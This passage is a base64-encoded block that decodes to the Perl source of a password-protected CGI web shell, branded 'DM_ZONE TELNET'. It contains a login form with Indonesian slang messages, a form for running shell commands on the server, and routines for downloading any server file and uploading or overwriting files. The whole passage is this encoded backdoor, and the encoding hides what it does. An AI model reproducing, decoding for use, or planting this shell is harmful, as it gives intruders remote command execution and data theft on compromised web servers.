yaW50IDw8RU5EOw0KPGJyPkxvZ2luIDogRE1fWk9ORTxicj4NCg0KUGFzc3dvcmQgU2FsYWggQ29rIDpwPGJyPjxicj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImxvZ2luIj4NCkxvZ2luIDogRE1fWk9ORTxicj4NClBhc3N3b3JkOjxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icCI+DQo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iID4+ICI+DQo8L2Zvcm0+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIGZvb3RlciBmb3IgdGhlIEhUTUwgUGFnZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUZvb3Rlcg0Kew0KCXByaW50ICI8YnI+PGZvbnQgY29sb3I9cmVkPm8tLS1bICBETV9aT05FIFRFTE5FVCAgXS0tLW88L2ZvbnQ+PC9jb2RlPjwvY2VudGVyPjwvYm9keT48L2h0bWw+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBSZXRyZWl2ZXMgdGhlIHZhbHVlcyBvZiBhbGwgY29va2llcy4gVGhlIGNvb2tpZXMgY2FuIGJlIGFjY2Vzc2VzIHVzaW5nIHRoZQ0KIyB2YXJpYWJsZSAkQ29va2llc3snJ30NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBHZXRDb29raWVzDQp7DQoJQGh0dHBjb29raWVzID0gc3BsaXQoLzsgLywkRU5WeydIVFRQX0NPT0tJRSd9KTsNCglmb3JlYWNoICRjb29raWUoQGh0dHBjb29raWVzKQ0KCXsNCgkJKCRpZCwgJHZhbCkgPSBzcGxpdCgvPS8sICRjb29raWUpOw0KCQkkQ29va2llc3skaWR9ID0gJHZhbDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBzY3JlZW4gd2hlbiB0aGUgdXNlciBsb2dzIG91dA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9nb3V0U2NyZWVuDQp7DQoJcHJpbnQgIkxPRyBPVVQgU1VLU0VTIENPSyA6UDxicj48YnI+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2luIGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUNCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQoJZXhpdDsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0DQojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0DQojIG1hdGNoIG9yIGlmIG5vIHBhc3N3b3JkIGlzIGVudGVyZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlcg0KIyB0byBsb2dpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dpbiANCnsNCglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZA0KCXsNCgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsNCgkJJlByaW50UGFnZUhlYWRlcjsNCgkJcHJpbnQgJkxpc3REaXI7DQoJfQ0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJJlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFzc3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJCX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlleGl0Ow0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCglteSAkZGlyPSAiPHNwYW4gc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz4iLiZBZGRMaW5rRGlyKCJjb21tYW5kIikuIjwvc3Bhbj4iOw0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsNCglyZXR1cm4gPDxFTkQ7DQo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiPg0KDQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KJFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjUwIiBuYW1lPSJjIj4NCjxpbnB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJbXkgJGRpciA9ICZBZGRMaW5rRGlyKCJkb3dubG9hZCIpOyANCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJCAiOw0KCXJldHVybiA8PEVORDsNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgY2xhc3M9ImZpbGUiIHR5cGU9InRleHQiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+DQoNCjwvZm9ybT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCglteSAkZGlyPSAmQWRkTGlua0RpcigidXBsb2FkIik7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsNCglyZXR1cm4gPDxFTkQ7DQo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCiRQcm9tcHQgdXBsb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgY2xhc3M9ImZpbGUiIHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KT3B0aW9uczogJm5ic3A7PGlucHV0IHR5cGU9ImNoZWNrYm94IiBuYW1lPSJvIiBpZD0idXAiIHZhbHVlPSJvdmVyd3JpdGUiPg0KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+DQpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+DQo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4NCg0KPC9mb3JtPg0KDQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bw0KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzDQojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBDb21tYW5kVGltZW91dA0Kew0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgkJcmV0dXJuIDw8RU5EOw0KPC90ZXh0YXJlYT4NCjxicj48Zm9udCBjb2xvcj15ZWxsb3c+DQpDb21tYW5kIGV4Y2VlZGVkIG1heGltdW0gdGltZSBvZiAkQ29tbWFuZFRpbWVvdXREdXJhdGlvbiBzZWNvbmQocykuPC9mb250Pg0KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250Pg0KRU5EDQoJfQ0KfQ0KDQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMgZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsNCglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglteSAkcmVzdWx0PSIiOw0KCWlmKC1lICRGaWxlVXJsKSAjIGlmIHRoZSBmaWxlIGV4aXN0cw0KCXsNCgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3Nlcg0KCQkkRmlsZVVybCA9fiBzLyhbXmEtekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsNCgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkcmVzdWx0IC49IDw8RU5EOw0KU2VuZGluZyBGaWxlICRUcmFuc2ZlckZpbGUuLi48YnI+DQoNCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LA0KPGEgaHJlZj0iJERvd25sb2FkTGluayI+Q2xpY2sgSGVyZTwvYT4NCkVORA0KCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCX0NCgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJHJlc3VsdCAuPSAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIHJlYWRzIHRoZSBzcGVjaWZpZWQgZmlsZSBmcm9tIHRoZSBkaXNrIGFuZCBzZW5kcyBpdCB0byB0aGUNCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIHNlbnQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXINCnsNCglteSAkcmVzdWx0ID0gIiI7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlmKG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNURE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShTRU5ERklMRSk7DQoJCWV4aXQoMSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAkISI7DQoJCSRyZXN1bHQgLj0mUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlDQojIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsgdGhyb3VnaCB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMgVGhpcyBmdW5jdGlvbiBpcyBhbHNvIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGNsaWNrcyBvbiB0aGF0IGxpbmsuIEluIHRoaXMgY2FzZSwNCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCZWdpbkRvd25sb2FkDQp7DQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUNCiMgZmlsZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBzdGFydHMgdGhlIHVwbG9hZCBwcm9jZXNzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFVwbG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4NCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQ0KCXsNCgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOw0KDQoJfQ0KCW15ICRyZXN1bHQ9IiI7DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCgkkcmVzdWx0IC49ICJVcGxvYWRpbmcgJFRyYW5zZmVyRmlsZSB0byAkQ3VycmVudERpci4uLjxicj4iOw0KDQoJIyBnZXQgdGhlIGZ1bGxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgY3JlYXRlZA0KCWNob3AoJFRhcmdldE5hbWUpIGlmICgkVGFyZ2V0TmFtZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7DQoJJFRhcmdldE5hbWUgLj0gJFBhdGhTZXAuJDE7DQoNCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsNCgkjIGlmIHRoZSBmaWxlIGV4aXN0cyBhbmQgd2UgYXJlIG5vdCBzdXBwb3NlZCB0byBvdmVyd3JpdGUgaXQNCglpZigtZSAkVGFyZ2V0TmFtZSAmJiAkT3B0aW9ucyBuZSAib3ZlcndyaXRlIikNCgl7DQoJCSRyZXN1bHQgLj0gIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQkkcmVzdWx0IC49ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCSRyZXN1bHQgLj0gIkZpbGUgUGF0aDogJFRhcmdldE5hbWU8YnI+IjsNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlLiBJZiB0aGUNCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsNCiMgdGhyb3VnaCAgd2hpY2ggdGhlIGZpbGUgY2FuIGJlIGRvd25sb2FkZWQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRG93bmxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4NCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlyZXR1cm4gJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgl9DQoJDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfCAoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCXJldHVybiAmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsNCgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua